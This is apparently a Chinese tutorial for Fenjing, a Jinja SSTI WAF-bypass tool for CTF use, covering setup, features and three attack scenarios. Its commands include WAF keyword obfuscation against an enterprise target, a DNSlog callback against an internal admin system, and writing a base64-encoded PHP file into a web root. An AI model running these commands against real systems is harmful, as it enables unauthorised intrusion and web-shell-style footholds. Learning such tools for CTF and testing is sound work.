3个实战突破步骤：Jinja SSTI绕过工具从场景分析到漏洞利用

Fenjing作为一款专注于CTF比赛的Jinja SSTI绕过工具，能够智能识别并突破各类WAF防护机制。本文将通过场景化应用、技术原理解析和实战进阶三个维度，帮助安全测试人员掌握从环境适配到复杂漏洞利用的全流程技能，特别适合CTF选手和Web安全爱好者提升自动化漏洞检测与利用能力。

一、多场景环境适配指南

系统兼容性矩阵

操作系统	支持版本	安装方式	关键依赖
Linux	Ubuntu 18.04+ / CentOS 7+	pipx/pip/Docker	Python 3.7+, libcurl
macOS	10.15+	pipx/pip	Xcode Command Line Tools
Windows	10/11	WSL2+pipx	Ubuntu子系统

环境部署流程

🔍 探索：环境检查

python --version  # 确认Python版本≥3.7
git clone https://gitcode.com/gh_mirrors/fe/Fenjing
cd Fenjing

🛠️ 实践：三种部署方案

方案A：隔离环境部署（推荐）

# 安装pipx
python -m pip install --user pipx
python -m pipx ensurepath
# 部署Fenjing
pipx install .

方案B：开发模式部署

python -m venv .venv
source .venv/bin/activate  # Linux/macOS
.venv\Scripts\activate     # Windows
pip install -r requirements-devel.txt

方案C：容器化部署

docker build -t fenjing .
docker run -p 11451:11451 fenjing

📝 实践笔记

• 网络受限环境可使用requirements.txt离线安装：pip download -r requirements.txt -d ./packages
• Windows用户建议优先使用WSL2环境以获得最佳兼容性
• 低配置设备可添加--lightweight参数减少资源占用

📌 关键提示：环境部署完成后，可通过fenjing --version验证安装状态，首次运行会自动下载必要的规则库（约20MB）。

二、技术能力图谱解析

Fenjing的核心能力体现在三大维度，形成完整的SSTI漏洞检测与利用闭环：

功能矩阵

能力模块	核心功能	关键参数	应用场景
智能扫描	自动发现SSTI注入点	--depth 3 - 扫描深度 --threads 5 - 并发线程	未知目标快速探测
payload生成	动态绕过WAF规则	--detect-mode accurate - 检测模式 --tamper base64 - 编码策略	复杂WAF环境
交互控制	命令执行与结果回显	--interactive - 交互模式 --output json - 结果格式	漏洞验证与利用
WebUI界面	可视化操作平台	--port 8080 - 端口设置 --auth admin:pass - 访问控制	新手友好型操作

Web安全测试工具Fenjing的图形化操作界面，展示目标配置与攻击参数设置区域

技术原理简析

💡 技巧：核心工作流程

1. 指纹识别：通过特定payload探测目标模板引擎类型与版本
2. 规则匹配：基于内置的200+WAF特征库识别防护机制
3. 动态变异：使用遗传算法生成针对性绕过payload
4. 结果验证：多维度确认命令执行效果（时间延迟、文件写入、DNSlog等）

📝 实践笔记

• 规则库位于fenjing/rules/目录，可通过添加自定义规则文件扩展检测能力
• full_payload_gen.py模块实现了payload的智能组合逻辑
• 上下文感知功能通过context_vars.py实现对渲染环境的动态适配

📌 关键提示：理解工具的规则匹配逻辑（rules_utils.py）有助于自定义绕过策略，应对新型WAF防护。

三、实战攻击场景进阶

场景一：基础Jinja2 SSTI绕过

目标场景：某CTF比赛中的博客系统，存在简单过滤的Jinja2模板注入点

核心障碍：关键词过滤（{{, }}, _, class等）

突破策略：

1. 使用命令行扫描模块定位注入点：

fenjing scan --url http://target.com/article --method POST --data "title=test&content=test"

2. 启动针对性攻击：

fenjing crack --url http://target.com/article --param content --detect-mode fast --tamper double_encode

Web安全测试中使用Fenjing命令行工具进行SSTI漏洞扫描的操作界面

场景二：复杂WAF环境突破

目标场景：企业级应用的搜索功能，部署Cloudflare WAF+自研规则

核心障碍：多层检测（模式匹配+行为分析+频率限制）

突破策略：

1. 启用精准检测模式：

fenjing crack --url http://target.com/search --param q --detect-mode accurate --delay 1.5

2. 自定义绕过规则：

fenjing crack --waf custom --keywords "system,exec,os" --replace "sys%74em,e%78ec,o%73"

场景三：无回显环境利用

目标场景：内部管理系统，存在SSTI但无直接命令回显

核心障碍：无法直接观察执行结果

突破策略：

1. 配置DNSlog回调：

fenjing crack --url http://internal.system/admin --param username --dnslog your.dnslog.cn

2. 使用文件写入验证：

fenjing crack --eval-args-payload --tamper base64 --cmd "echo PD9waHAgcGhwaW5mbygpOz8+ > /var/www/html/test.php"

📝 实践笔记

• 无回显场景优先使用--dnslog参数或--write-file选项验证
• 针对云WAF可尝试--proxy参数分散请求来源
• 复杂场景下可组合使用多种--tamper策略（如base64,html,unicode）

通过以上三个递进式场景的实践，您已掌握Fenjing工具在不同防护环境下的核心应用策略。实际CTF比赛中，建议先使用scan功能快速定位漏洞点，再根据目标防护强度选择合适的攻击模式和绕过策略，必要时通过WebUI界面进行精细化参数调整。工具的真正威力在于灵活组合各种功能模块，形成针对性的漏洞利用方案。